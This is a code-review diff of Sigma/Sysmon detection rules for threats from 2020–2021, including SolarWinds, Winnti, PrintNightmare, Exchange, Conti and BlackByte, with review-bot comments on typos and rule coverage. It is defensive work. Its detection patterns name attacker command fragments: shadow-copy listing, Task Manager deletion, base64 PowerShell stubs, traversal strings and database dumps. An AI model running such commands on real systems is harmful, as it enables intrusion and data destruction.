b/sigma/sysmon/emerging-threats/2020/TA/SolarWinds-Supply-Chain/proc_creation_win_apt_unc2452_vbscript_pattern.yml 
@@ -20,14 +20,14 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - CommandLine|contains|all: + CommandLine|contains|all: - Execute - CreateObject - RegRead - window.close - \Microsoft\Windows\CurrentVersion filter: - CommandLine|contains: \Software\Microsoft\Windows\CurrentVersion\Run + CommandLine|contains: \Software\Microsoft\Windows\CurrentVersion\Run condition: process_creation and (selection and not filter) falsepositives: - Unknown diff --git a/sigma/sysmon/emerging-threats/2020/TA/TAIDOOR-RAT/proc_creation_win_apt_taidoor.yml b/sigma/sysmon/emerging-threats/2020/TA/TAIDOOR-RAT/proc_creation_win_apt_taidoor.yml index d81d166c0..f20750c90 100644 --- a/sigma/sysmon/emerging-threats/2020/TA/TAIDOOR-RAT/proc_creation_win_apt_taidoor.yml +++ b/sigma/sysmon/emerging-threats/2020/TA/TAIDOOR-RAT/proc_creation_win_apt_taidoor.yml @@ -1,8 +1,7 @@ title: TAIDOOR RAT DLL Load id: d1aa3382-abab-446f-96ea-4de52908210b status: test -description: Detects specific process characteristics of Chinese TAIDOOR RAT malware - load +description: Detects specific process characteristics of Chinese TAIDOOR RAT malware load references: - https://us-cert.cisa.gov/ncas/analysis-reports/ar20-216a author: Florian Roth (Nextron Systems) @@ -21,13 +20,13 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection1: - CommandLine|contains: + CommandLine|contains: - dll,MyStart - dll MyStart selection2a: - CommandLine|endswith: ' MyStart' + CommandLine|endswith: ' MyStart' selection2b: - CommandLine|contains: rundll32.exe + CommandLine|contains: rundll32.exe condition: process_creation and (selection1 or ( selection2a and selection2b )) falsepositives: - Unknown diff --git a/sigma/sysmon/emerging-threats/2020/TA/Winnti/proc_creation_win_apt_winnti_mal_hk_jan20.yml b/sigma/sysmon/emerging-threats/2020/TA/Winnti/proc_creation_win_apt_winnti_mal_hk_jan20.yml index 6ba86ffa8..5767bca78 100644 
--- a/sigma/sysmon/emerging-threats/2020/TA/Winnti/proc_creation_win_apt_winnti_mal_hk_jan20.yml +++ b/sigma/sysmon/emerging-threats/2020/TA/Winnti/proc_creation_win_apt_winnti_mal_hk_jan20.yml @@ -1,8 +1,7 @@ title: Winnti Malware HK University Campaign id: 3121461b-5aa0-4a41-b910-66d25524edbb status: test -description: Detects specific process characteristics of Winnti malware noticed in - Dec/Jan 2020 in a campaign against Honk Kong universities +description: Detects specific process characteristics of Winnti malware noticed in Dec/Jan 2020 in a campaign against Honk Kong universities references: - https://www.welivesecurity.com/2020/01/31/winnti-group-targeting-universities-hong-kong/ author: Florian Roth (Nextron Systems), Markus Neis diff --git a/sigma/sysmon/emerging-threats/2020/TA/Winnti/proc_creation_win_apt_winnti_pipemon.yml b/sigma/sysmon/emerging-threats/2020/TA/Winnti/proc_creation_win_apt_winnti_pipemon.yml index 8db3cf985..13263821d 100644 --- a/sigma/sysmon/emerging-threats/2020/TA/Winnti/proc_creation_win_apt_winnti_pipemon.yml +++ b/sigma/sysmon/emerging-threats/2020/TA/Winnti/proc_creation_win_apt_winnti_pipemon.yml @@ -1,8 +1,7 @@ title: Winnti Pipemon Characteristics id: 73d70463-75c9-4258-92c6-17500fe972f2 status: stable -description: Detects specific process characteristics of Winnti Pipemon malware reported - by ESET +description: Detects specific process characteristics of Winnti Pipemon malware reported by ESET references: - https://www.welivesecurity.com/2020/05/21/no-game-over-winnti-group/ author: Florian Roth (Nextron Systems), oscd.community @@ -22,10 +21,10 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_1: - CommandLine|contains: setup0.exe -p + CommandLine|contains: setup0.exe -p selection_2: - CommandLine|contains: setup.exe - CommandLine|endswith: + CommandLine|contains: setup.exe + CommandLine|endswith: - -x:0 - -x:1 - -x:2 
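Review bot: The reflowed description still reads `campaign against Honk Kong universities`; the reference URL and the title both say Hong Kong, so the typo was carried into the new single-line form. I would change it to `... in a campaign against Hong Kong universities`. No detection logic changes in this hunk.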
diff --git a/sigma/sysmon/emerging-threats/2021/Exploits/CVE-2021-1675/file_event_win_cve_2021_1675_printspooler.yml b/sigma/sysmon/emerging-threats/2021/Exploits/CVE-2021-1675/file_event_win_cve_2021_1675_printspooler.yml index 60cd1e71e..f369f8c5c 100644 --- a/sigma/sysmon/emerging-threats/2021/Exploits/CVE-2021-1675/file_event_win_cve_2021_1675_printspooler.yml +++ b/sigma/sysmon/emerging-threats/2021/Exploits/CVE-2021-1675/file_event_win_cve_2021_1675_printspooler.yml @@ -1,8 +1,7 @@ title: CVE-2021-1675 Print Spooler Exploitation Filename Pattern id: 2131cfb3-8c12-45e8-8fa0-31f5924e9f07 status: test -description: Detects the default filename used in PoC code against print spooler vulnerability - CVE-2021-1675 +description: Detects the default filename used in PoC code against print spooler vulnerability CVE-2021-1675 references: - https://github.com/hhlxf/PrintNightmare - https://github.com/afwu/PrintNightmare diff --git a/sigma/sysmon/emerging-threats/2021/Exploits/CVE-2021-26084/proc_creation_win_exploit_cve_2021_26084_atlassian_confluence.yml b/sigma/sysmon/emerging-threats/2021/Exploits/CVE-2021-26084/proc_creation_win_exploit_cve_2021_26084_atlassian_confluence.yml index ceac6bdd8..8d1a3514a 100644 --- a/sigma/sysmon/emerging-threats/2021/Exploits/CVE-2021-26084/proc_creation_win_exploit_cve_2021_26084_atlassian_confluence.yml +++ b/sigma/sysmon/emerging-threats/2021/Exploits/CVE-2021-26084/proc_creation_win_exploit_cve_2021_26084_atlassian_confluence.yml 
@@ -1,8 +1,7 @@ title: Potential Atlassian Confluence CVE-2021-26084 Exploitation Attempt id: 245f92e3-c4da-45f1-9070-bc552e06db11 status: test -description: Detects spawning of suspicious child processes by Atlassian Confluence - server which may indicate successful exploitation of CVE-2021-26084 +description: Detects spawning of suspicious child processes by Atlassian Confluence server which may indicate successful exploitation of CVE-2021-26084 references: - https://nvd.nist.gov/vuln/detail/CVE-2021-26084 - https://confluence.atlassian.com/doc/confluence-security-advisory-2021-08-25-1077906215.html @@ -26,8 +25,9 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: + # Monitor suspicious child processes spawned by Confluence ParentImage|endswith: \Atlassian\Confluence\jre\bin\java.exe - CommandLine|contains: + CommandLine|contains: - certutil - cmd /c - cmd /k diff --git a/sigma/sysmon/emerging-threats/2021/Exploits/CVE-2021-26857/proc_creation_win_exploit_cve_2021_26857_msexchange.yml b/sigma/sysmon/emerging-threats/2021/Exploits/CVE-2021-26857/proc_creation_win_exploit_cve_2021_26857_msexchange.yml index 0f84ccbd4..e1d85d78b 100644 --- a/sigma/sysmon/emerging-threats/2021/Exploits/CVE-2021-26857/proc_creation_win_exploit_cve_2021_26857_msexchange.yml +++ b/sigma/sysmon/emerging-threats/2021/Exploits/CVE-2021-26857/proc_creation_win_exploit_cve_2021_26857_msexchange.yml 
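Review bot: `ParentImage|endswith: \Atlassian\Confluence\jre\bin\java.exe` only matches Confluence launched through its bundled JRE; an instance registered as a Windows service typically runs under the Apache procrun wrapper (`tomcat9.exe`/`tomcat8.exe` in the Confluence `bin` directory), and a deployment pointed at an external JRE spawns a `java.exe` from elsewhere, so child processes in those setups would never satisfy this selection (worth confirming against a service-installed host). I would widen the parent check to `ParentImage|contains: \Atlassian\Confluence\` plus `ParentImage|endswith: [\java.exe, \tomcat8.exe, \tomcat9.exe]`, which keeps the install-path anchor the new comment relies on. The selection's CommandLine list continues past the end of the hunk.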
@@ -1,9 +1,7 @@ title: Potential CVE-2021-26857 Exploitation Attempt id: cd479ccc-d8f0-4c66-ba7d-e06286f3f887 status: stable -description: Detects possible successful exploitation for vulnerability described - in CVE-2021-26857 by looking for | abnormal subprocesses spawning by Exchange - Server's Unified Messaging service +description: Detects possible successful exploitation for vulnerability described in CVE-2021-26857 by looking for | abnormal subprocesses spawning by Exchange Server's Unified Messaging service references: - https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/ author: Bhabesh Raj diff --git a/sigma/sysmon/emerging-threats/2021/Exploits/CVE-2021-26858/file_event_win_cve_2021_26858_msexchange.yml b/sigma/sysmon/emerging-threats/2021/Exploits/CVE-2021-26858/file_event_win_cve_2021_26858_msexchange.yml index 20b2110e0..a728e84f5 100644 --- a/sigma/sysmon/emerging-threats/2021/Exploits/CVE-2021-26858/file_event_win_cve_2021_26858_msexchange.yml +++ b/sigma/sysmon/emerging-threats/2021/Exploits/CVE-2021-26858/file_event_win_cve_2021_26858_msexchange.yml @@ -1,10 +1,10 @@ title: CVE-2021-26858 Exchange Exploitation id: b06335b3-55ac-4b41-937e-16b7f5d57dfd status: test -description: "Detects possible successful exploitation for vulnerability described\ - \ in CVE-2021-26858 by looking for\ncreation of non-standard files on disk by\ - \ Exchange Server\u2019s Unified Messaging service\nwhich could indicate dropping\ - \ web shells or other malicious content\n" +description: | + Detects possible successful exploitation for vulnerability described in CVE-2021-26858 by looking for + creation of non-standard files on disk by Exchange Server’s Unified Messaging service + which could indicate dropping web shells or other malicious content references: - https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/ author: Bhabesh Raj 
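Review bot: The joined `+description:` line still carries a stray `|` in the middle of the sentence (`by looking for | abnormal subprocesses`), which looks like a literal-block indicator that survived an earlier flattening of the text; the commit reflows the line but does not remove it. Suggest `description: Detects possible successful exploitation for vulnerability described in CVE-2021-26857 by looking for abnormal subprocesses spawning by Exchange Server's Unified Messaging service`. If multi-line text is wanted instead, the sibling CVE-2021-26858 rule in this same commit shows the proper `description: |` block form.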
diff --git a/sigma/sysmon/emerging-threats/2021/Exploits/CVE-2021-35211/proc_creation_win_exploit_cve_2021_35211_servu.yml b/sigma/sysmon/emerging-threats/2021/Exploits/CVE-2021-35211/proc_creation_win_exploit_cve_2021_35211_servu.yml index 7c17df0a1..55981f918 100644 --- a/sigma/sysmon/emerging-threats/2021/Exploits/CVE-2021-35211/proc_creation_win_exploit_cve_2021_35211_servu.yml +++ b/sigma/sysmon/emerging-threats/2021/Exploits/CVE-2021-35211/proc_creation_win_exploit_cve_2021_35211_servu.yml @@ -1,8 +1,7 @@ title: Serv-U Exploitation CVE-2021-35211 by DEV-0322 id: 75578840-9526-4b2a-9462-af469a45e767 status: test -description: Detects patterns as noticed in exploitation of Serv-U CVE-2021-35211 - vulnerability by threat group DEV-0322 +description: Detects patterns as noticed in exploitation of Serv-U CVE-2021-35211 vulnerability by threat group DEV-0322 references: - https://www.microsoft.com/security/blog/2021/07/13/microsoft-discovers-threat-actor-targeting-solarwinds-serv-u-software-with-0-day-exploit/ author: Florian Roth (Nextron Systems) @@ -13,6 +12,7 @@ tags: - attack.t1136.001 - cve.2021.35211 - detection.emerging_threats + # - threat_group.DEV-0322 - sysmon logsource: category: process_creation @@ -22,13 +22,13 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_whoami: - CommandLine|contains: whoami + CommandLine|contains: whoami selection_cmd_1: - CommandLine|contains: + CommandLine|contains: - ./Client/Common/ - .\Client\Common\ selection_cmd_2: - CommandLine|contains: C:\Windows\Temp\Serv-U.bat + CommandLine|contains: C:\Windows\Temp\Serv-U.bat condition: process_creation and (selection_whoami and 1 of selection_cmd*) falsepositives: - Unlikely diff --git a/sigma/sysmon/emerging-threats/2021/Exploits/CVE-2021-40444/file_event_win_exploit_cve_2021_40444.yml b/sigma/sysmon/emerging-threats/2021/Exploits/CVE-2021-40444/file_event_win_exploit_cve_2021_40444.yml index b17e9abcb..cdd6d23ce 100644 
--- a/sigma/sysmon/emerging-threats/2021/Exploits/CVE-2021-40444/file_event_win_exploit_cve_2021_40444.yml +++ b/sigma/sysmon/emerging-threats/2021/Exploits/CVE-2021-40444/file_event_win_exploit_cve_2021_40444.yml @@ -1,8 +1,7 @@ title: Suspicious Word Cab File Write CVE-2021-40444 id: 60c0a111-787a-4e8a-9262-ee485f3ef9d5 status: experimental -description: Detects file creation patterns noticeable during the exploitation of - CVE-2021-40444 +description: Detects file creation patterns noticeable during the exploitation of CVE-2021-40444 references: - https://twitter.com/RonnyTNL/status/1436334640617373699?s=20 - https://twitter.com/vanitasnk/status/1437329511142420483?s=21 diff --git a/sigma/sysmon/emerging-threats/2021/Exploits/CVE-2021-40444/proc_creation_win_exploit_cve_2021_40444.yml b/sigma/sysmon/emerging-threats/2021/Exploits/CVE-2021-40444/proc_creation_win_exploit_cve_2021_40444.yml index 4c07a180f..9c194f70a 100644 --- a/sigma/sysmon/emerging-threats/2021/Exploits/CVE-2021-40444/proc_creation_win_exploit_cve_2021_40444.yml +++ b/sigma/sysmon/emerging-threats/2021/Exploits/CVE-2021-40444/proc_creation_win_exploit_cve_2021_40444.yml @@ -1,8 +1,7 @@ title: Potential CVE-2021-40444 Exploitation Attempt id: 894397c6-da03-425c-a589-3d09e7d1f750 status: test -description: Detects potential exploitation of CVE-2021-40444 via suspicious process - patterns seen in in-the-wild exploitations +description: Detects potential exploitation of CVE-2021-40444 via suspicious process patterns seen in in-the-wild exploitations references: - https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-40444 - https://twitter.com/neonprimetime/status/1435584010202255375 @@ -30,7 +29,7 @@ detection: - \powerpnt.exe - \excel.exe filter: - CommandLine|endswith: + CommandLine|endswith: - \control.exe input.dll - \control.exe" input.dll condition: process_creation and (selection and not filter) 
diff --git a/sigma/sysmon/emerging-threats/2021/Exploits/CVE-2021-40444/proc_creation_win_exploit_cve_2021_40444_office_directory_traversal.yml b/sigma/sysmon/emerging-threats/2021/Exploits/CVE-2021-40444/proc_creation_win_exploit_cve_2021_40444_office_directory_traversal.yml index 6a582ac3e..5bb5638e8 100644 --- a/sigma/sysmon/emerging-threats/2021/Exploits/CVE-2021-40444/proc_creation_win_exploit_cve_2021_40444_office_directory_traversal.yml +++ b/sigma/sysmon/emerging-threats/2021/Exploits/CVE-2021-40444/proc_creation_win_exploit_cve_2021_40444_office_directory_traversal.yml @@ -1,9 +1,7 @@ title: Potential Exploitation Attempt From Office Application id: 868955d9-697e-45d4-a3da-360cefd7c216 status: test -description: Detects Office applications executing a child process that includes directory - traversal patterns. This could be an attempt to exploit CVE-2022-30190 (MSDT RCE) - or CVE-2021-40444 (MSHTML RCE) +description: Detects Office applications executing a child process that includes directory traversal patterns. This could be an attempt to exploit CVE-2022-30190 (MSDT RCE) or CVE-2021-40444 (MSHTML RCE) references: - https://twitter.com/sbousseaden/status/1531653369546301440 - https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-40444 @@ -33,7 +31,7 @@ detection: - \mspub.exe - \eqnedt32.exe - \visio.exe - CommandLine|contains: + CommandLine|contains: - ../../../.. - ..\..\..\.. - ..//..//..//.. diff --git a/sigma/sysmon/emerging-threats/2021/Exploits/CVE-2021-41379/file_event_win_cve_2021_41379_msi_lpe.yml b/sigma/sysmon/emerging-threats/2021/Exploits/CVE-2021-41379/file_event_win_cve_2021_41379_msi_lpe.yml index a21db017b..9a637475e 100644 --- a/sigma/sysmon/emerging-threats/2021/Exploits/CVE-2021-41379/file_event_win_cve_2021_41379_msi_lpe.yml +++ b/sigma/sysmon/emerging-threats/2021/Exploits/CVE-2021-41379/file_event_win_cve_2021_41379_msi_lpe.yml 
@@ -1,8 +1,7 @@ title: InstallerFileTakeOver LPE CVE-2021-41379 File Create Event id: 3be82d5d-09fe-4d6a-a275-0d40d234d324 status: test -description: Detects signs of the exploitation of LPE CVE-2021-41379 that include - an msiexec process that creates an elevation_service.exe file +description: Detects signs of the exploitation of LPE CVE-2021-41379 that include an msiexec process that creates an elevation_service.exe file references: - https://github.com/klinix5/InstallerFileTakeOver - https://www.zerodayinitiative.com/advisories/ZDI-21-1308/ diff --git a/sigma/sysmon/emerging-threats/2021/Exploits/CVE-2021-41379/proc_creation_win_exploit_cve_2021_41379.yml b/sigma/sysmon/emerging-threats/2021/Exploits/CVE-2021-41379/proc_creation_win_exploit_cve_2021_41379.yml index aae727616..415329558 100644 --- a/sigma/sysmon/emerging-threats/2021/Exploits/CVE-2021-41379/proc_creation_win_exploit_cve_2021_41379.yml +++ b/sigma/sysmon/emerging-threats/2021/Exploits/CVE-2021-41379/proc_creation_win_exploit_cve_2021_41379.yml @@ -1,10 +1,7 @@ title: Potential CVE-2021-41379 Exploitation Attempt id: af8bbce4-f751-46b4-8d91-82a33a736f61 status: test -description: Detects potential exploitation attempts of CVE-2021-41379 (InstallerFileTakeOver), - a local privilege escalation (LPE) vulnerability where the attacker spawns a "cmd.exe" - process as a child of Microsoft Edge elevation service "elevation_service" with - "LOCAL_SYSTEM" rights +description: Detects potential exploitation attempts of CVE-2021-41379 (InstallerFileTakeOver), a local privilege escalation (LPE) vulnerability where the attacker spawns a "cmd.exe" process as a child of Microsoft Edge elevation service "elevation_service" with "LOCAL_SYSTEM" rights references: - https://web.archive.org/web/20220421061949/https://github.com/klinix5/InstallerFileTakeOver - https://www.bleepingcomputer.com/news/microsoft/new-windows-zero-day-with-public-exploit-lets-you-become-an-admin/ 
@@ -27,14 +24,14 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: - - \cmd.exe - - \powershell.exe - - \pwsh.exe - - OriginalFileName: - - Cmd.Exe - - PowerShell.EXE - - pwsh.dll + - Image|endswith: + - \cmd.exe + - \powershell.exe + - \pwsh.exe + - OriginalFileName: + - Cmd.Exe + - PowerShell.EXE + - pwsh.dll selection_parent: ParentImage|endswith: \elevation_service.exe IntegrityLevel: System diff --git a/sigma/sysmon/emerging-threats/2021/Exploits/CVE-2021-44077/file_event_win_cve_2021_44077_poc_default_files.yml b/sigma/sysmon/emerging-threats/2021/Exploits/CVE-2021-44077/file_event_win_cve_2021_44077_poc_default_files.yml index 92b491ba8..a77fba75d 100644 --- a/sigma/sysmon/emerging-threats/2021/Exploits/CVE-2021-44077/file_event_win_cve_2021_44077_poc_default_files.yml +++ b/sigma/sysmon/emerging-threats/2021/Exploits/CVE-2021-44077/file_event_win_cve_2021_44077_poc_default_files.yml @@ -1,9 +1,7 @@ title: CVE-2021-44077 POC Default Dropped File id: 7b501acf-fa98-4272-aa39-194f82edc8a3 status: test -description: Detects the creation of "msiexec.exe" in the "bin" directory of the ManageEngine - SupportCenter Plus (Related to CVE-2021-44077) and public POC available (See references - section) +description: Detects the creation of "msiexec.exe" in the "bin" directory of the ManageEngine SupportCenter Plus (Related to CVE-2021-44077) and public POC available (See references section) references: - https://thedfirreport.com/2022/06/06/will-the-real-msiexec-please-stand-up-exploit-leads-to-data-exfiltration/ - https://github.com/horizon3ai/CVE-2021-44077/blob/b7a48e25824e8ead95e028475c7fd0e107e6e6bf/exploit.py diff --git a/sigma/sysmon/emerging-threats/2021/Exploits/RazerInstaller-LPE-Exploit/proc_creation_win_exploit_other_razorinstaller_lpe.yml b/sigma/sysmon/emerging-threats/2021/Exploits/RazerInstaller-LPE-Exploit/proc_creation_win_exploit_other_razorinstaller_lpe.yml index fe12551f3..6486ed270 100644 
--- a/sigma/sysmon/emerging-threats/2021/Exploits/RazerInstaller-LPE-Exploit/proc_creation_win_exploit_other_razorinstaller_lpe.yml +++ b/sigma/sysmon/emerging-threats/2021/Exploits/RazerInstaller-LPE-Exploit/proc_creation_win_exploit_other_razorinstaller_lpe.yml @@ -1,9 +1,7 @@ title: Suspicious RazerInstaller Explorer Subprocess id: a4eaf250-7dc1-4842-862a-5e71cd59a167 status: test -description: Detects a explorer.exe sub process of the RazerInstaller software which - can be invoked from the installer to select a different installation folder but - can also be exploited to escalate privileges to LOCAL SYSTEM +description: Detects a explorer.exe sub process of the RazerInstaller software which can be invoked from the installer to select a different installation folder but can also be exploited to escalate privileges to LOCAL SYSTEM references: - https://twitter.com/j0nh4t/status/1429049506021138437 - https://streamable.com/q2dsji @@ -29,7 +27,6 @@ detection: Image|startswith: C:\Windows\Installer\Razer\Installer\ condition: process_creation and (selection and not filter) falsepositives: - - User selecting a different installation folder (check for other sub processes - of this explorer.exe process) + - User selecting a different installation folder (check for other sub processes of this explorer.exe process) level: high ruletype: Sigma diff --git a/sigma/sysmon/emerging-threats/2021/Exploits/SystemNightmare-Exploit/proc_creation_win_exploit_other_systemnightmare.yml b/sigma/sysmon/emerging-threats/2021/Exploits/SystemNightmare-Exploit/proc_creation_win_exploit_other_systemnightmare.yml index 967fcbb66..c0ecdd00d 100644 --- a/sigma/sysmon/emerging-threats/2021/Exploits/SystemNightmare-Exploit/proc_creation_win_exploit_other_systemnightmare.yml +++ b/sigma/sysmon/emerging-threats/2021/Exploits/SystemNightmare-Exploit/proc_creation_win_exploit_other_systemnightmare.yml 
@@ -1,8 +1,7 @@ title: Potential SystemNightmare Exploitation Attempt id: c01f7bd6-0c1d-47aa-9c61-187b91273a16 status: test -description: Detects an exploitation attempt of SystemNightmare in order to obtain - a shell as LOCAL_SYSTEM +description: Detects an exploitation attempt of SystemNightmare in order to obtain a shell as LOCAL_SYSTEM references: - https://github.com/GossiTheDog/SystemNightmare author: Florian Roth (Nextron Systems) @@ -21,7 +20,7 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - CommandLine|contains: + CommandLine|contains: - printnightmare.gentilkiwi.com - ' /user:gentilguest ' - Kiwi Legit Printer diff --git a/sigma/sysmon/emerging-threats/2021/Exploits/file_event_win_cve_2021_31979_cve_2021_33771_exploits.yml b/sigma/sysmon/emerging-threats/2021/Exploits/file_event_win_cve_2021_31979_cve_2021_33771_exploits.yml index e694576c1..a3097e040 100644 --- a/sigma/sysmon/emerging-threats/2021/Exploits/file_event_win_cve_2021_31979_cve_2021_33771_exploits.yml +++ b/sigma/sysmon/emerging-threats/2021/Exploits/file_event_win_cve_2021_31979_cve_2021_33771_exploits.yml @@ -1,8 +1,7 @@ title: CVE-2021-31979 CVE-2021-33771 Exploits by Sourgum id: ad7085ac-92e4-4b76-8ce2-276d2c0e68ef status: test -description: Detects patterns as noticed in exploitation of Windows CVE-2021-31979 - CVE-2021-33771 vulnerability and DevilsTongue malware by threat group Sourgum +description: Detects patterns as noticed in exploitation of Windows CVE-2021-31979 CVE-2021-33771 vulnerability and DevilsTongue malware by threat group Sourgum references: - https://www.microsoft.com/security/blog/2021/07/15/protecting-customers-from-a-private-sector-offensive-actor-using-0-day-exploits-and-devilstongue-malware/ - https://citizenlab.ca/2021/07/hooking-candiru-another-mercenary-spyware-vendor-comes-into-focus/ 
@@ -16,6 +15,7 @@ tags: - cve.2021.33771 - cve.2021.31979 - detection.emerging_threats + # - threat_group.Sourgum - sysmon logsource: product: windows diff --git a/sigma/sysmon/emerging-threats/2021/Exploits/registry_set_cve_2021_31979_cve_2021_33771_exploits.yml b/sigma/sysmon/emerging-threats/2021/Exploits/registry_set_cve_2021_31979_cve_2021_33771_exploits.yml index b40d00d0a..d221164e7 100644 --- a/sigma/sysmon/emerging-threats/2021/Exploits/registry_set_cve_2021_31979_cve_2021_33771_exploits.yml +++ b/sigma/sysmon/emerging-threats/2021/Exploits/registry_set_cve_2021_31979_cve_2021_33771_exploits.yml @@ -1,8 +1,7 @@ title: CVE-2021-31979 CVE-2021-33771 Exploits id: 32b5db62-cb5f-4266-9639-0fa48376ac00 status: experimental -description: Detects patterns as noticed in exploitation of Windows CVE-2021-31979 - CVE-2021-33771 vulnerability and DevilsTongue malware by threat group Sourgum +description: Detects patterns as noticed in exploitation of Windows CVE-2021-31979 CVE-2021-33771 vulnerability and DevilsTongue malware by threat group Sourgum references: - https://www.microsoft.com/security/blog/2021/07/15/protecting-customers-from-a-private-sector-offensive-actor-using-0-day-exploits-and-devilstongue-malware/ - https://citizenlab.ca/2021/07/hooking-candiru-another-mercenary-spyware-vendor-comes-into-focus/ @@ -16,6 +15,7 @@ tags: - cve.2021.33771 - cve.2021.31979 - detection.emerging_threats + # - threat_group.Sourgum - sysmon logsource: product: windows diff --git a/sigma/sysmon/emerging-threats/2021/Malware/BlackByte/proc_creation_win_malware_blackbyte_ransomware.yml b/sigma/sysmon/emerging-threats/2021/Malware/BlackByte/proc_creation_win_malware_blackbyte_ransomware.yml index af7a91958..6ae585c59 100644 --- a/sigma/sysmon/emerging-threats/2021/Malware/BlackByte/proc_creation_win_malware_blackbyte_ransomware.yml +++ b/sigma/sysmon/emerging-threats/2021/Malware/BlackByte/proc_creation_win_malware_blackbyte_ransomware.yml 
@@ -1,8 +1,7 @@ title: Potential BlackByte Ransomware Activity id: 999e8307-a775-4d5f-addc-4855632335be status: test -description: Detects command line patterns used by BlackByte ransomware in different - operations +description: Detects command line patterns used by BlackByte ransomware in different operations references: - https://redcanary.com/blog/blackbyte-ransomware/ author: Florian Roth (Nextron Systems) @@ -27,9 +26,9 @@ detection: Channel: Microsoft-Windows-Sysmon/Operational selection_1: Image|startswith: C:\Users\Public\ - CommandLine|contains: ' -single ' + CommandLine|contains: ' -single ' selection_2: - CommandLine|contains: + CommandLine|contains: - del C:\Windows\System32\Taskmgr.exe - ;Set-Service -StartupType Disabled $ - powershell -command "$x =[System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String( diff --git a/sigma/sysmon/emerging-threats/2021/Malware/Conti/proc_creation_win_malware_conti.yml b/sigma/sysmon/emerging-threats/2021/Malware/Conti/proc_creation_win_malware_conti.yml index 17b3b8cce..a14e0c920 100644 --- a/sigma/sysmon/emerging-threats/2021/Malware/Conti/proc_creation_win_malware_conti.yml +++ b/sigma/sysmon/emerging-threats/2021/Malware/Conti/proc_creation_win_malware_conti.yml @@ -20,7 +20,7 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - CommandLine|contains|all: + CommandLine|contains|all: - vssadmin list shadows - log.txt condition: process_creation and selection diff --git a/sigma/sysmon/emerging-threats/2021/Malware/Conti/proc_creation_win_malware_conti_7zip.yml b/sigma/sysmon/emerging-threats/2021/Malware/Conti/proc_creation_win_malware_conti_7zip.yml index e3cc5ba6a..a58e5d788 100644 --- a/sigma/sysmon/emerging-threats/2021/Malware/Conti/proc_creation_win_malware_conti_7zip.yml +++ b/sigma/sysmon/emerging-threats/2021/Malware/Conti/proc_creation_win_malware_conti_7zip.yml 
@@ -21,7 +21,7 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - CommandLine|contains|all: + CommandLine|contains|all: - 7za.exe - \\C$\\temp\\log.zip condition: process_creation and selection diff --git a/sigma/sysmon/emerging-threats/2021/Malware/Conti/proc_creation_win_malware_conti_ransomware_commands.yml b/sigma/sysmon/emerging-threats/2021/Malware/Conti/proc_creation_win_malware_conti_ransomware_commands.yml index 1a72ecc29..21ce45bde 100644 --- a/sigma/sysmon/emerging-threats/2021/Malware/Conti/proc_creation_win_malware_conti_ransomware_commands.yml +++ b/sigma/sysmon/emerging-threats/2021/Malware/Conti/proc_creation_win_malware_conti_ransomware_commands.yml @@ -22,10 +22,10 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - CommandLine|contains|all: + CommandLine|contains|all: - '-m ' - '-net ' - - '-size ' + - '-size ' # Size 10 in references - '-nomutex ' - -p \\\\ - $ diff --git a/sigma/sysmon/emerging-threats/2021/Malware/Conti/proc_creation_win_malware_conti_ransomware_database_dump.yml b/sigma/sysmon/emerging-threats/2021/Malware/Conti/proc_creation_win_malware_conti_ransomware_database_dump.yml index ec5a9d389..d74834054 100644 --- a/sigma/sysmon/emerging-threats/2021/Malware/Conti/proc_creation_win_malware_conti_ransomware_database_dump.yml +++ b/sigma/sysmon/emerging-threats/2021/Malware/Conti/proc_creation_win_malware_conti_ransomware_database_dump.yml @@ -3,7 +3,7 @@ id: 2f47f1fd-0901-466e-a770-3b7092834a1b status: test description: Detects a command used by conti to dump database references: - - https://twitter.com/vxunderground/status/1423336151860002816?s=20 + - https://twitter.com/vxunderground/status/1423336151860002816?s=20 # The leak info not the files itself - https://www.virustotal.com/gui/file/03e9b8c2e86d6db450e5eceec057d7e369ee2389b9daecaf06331a95410aa5f8/detection - https://docs.microsoft.com/en-us/sql/tools/sqlcmd-utility?view=sql-server-ver15 author: frack113 
@@ -22,14 +22,14 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_tools: - - Image|endswith: \sqlcmd.exe - - CommandLine|contains: - - 'sqlcmd ' - - sqlcmd.exe + - Image|endswith: \sqlcmd.exe + - CommandLine|contains: + - 'sqlcmd ' + - sqlcmd.exe selection_svr: - CommandLine|contains: ' -S localhost ' + CommandLine|contains: ' -S localhost ' selection_query: - CommandLine|contains: + CommandLine|contains: - sys.sysprocesses - master.dbo.sysdatabases - BACKUP DATABASE diff --git a/sigma/sysmon/emerging-threats/2021/Malware/DarkSide/proc_creation_win_malware_darkside_ransomware.yml b/sigma/sysmon/emerging-threats/2021/Malware/DarkSide/proc_creation_win_malware_darkside_ransomware.yml index ea85826a1..8a173be8a 100644 --- a/sigma/sysmon/emerging-threats/2021/Malware/DarkSide/proc_creation_win_malware_darkside_ransomware.yml +++ b/sigma/sysmon/emerging-threats/2021/Malware/DarkSide/proc_creation_win_malware_darkside_ransomware.yml @@ -21,7 +21,7 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection1: - CommandLine|contains: + CommandLine|contains: - =[char][byte]('0x'+ - ' -work worker0 -path ' selection2: diff --git a/sigma/sysmon/emerging-threats/2021/Malware/Devil-Bait/file_event_win_malware_devil_bait_script_drop.yml b/sigma/sysmon/emerging-threats/2021/Malware/Devil-Bait/file_event_win_malware_devil_bait_script_drop.yml index ef9bbfc6b..a64415e14 100644 --- a/sigma/sysmon/emerging-threats/2021/Malware/Devil-Bait/file_event_win_malware_devil_bait_script_drop.yml +++ 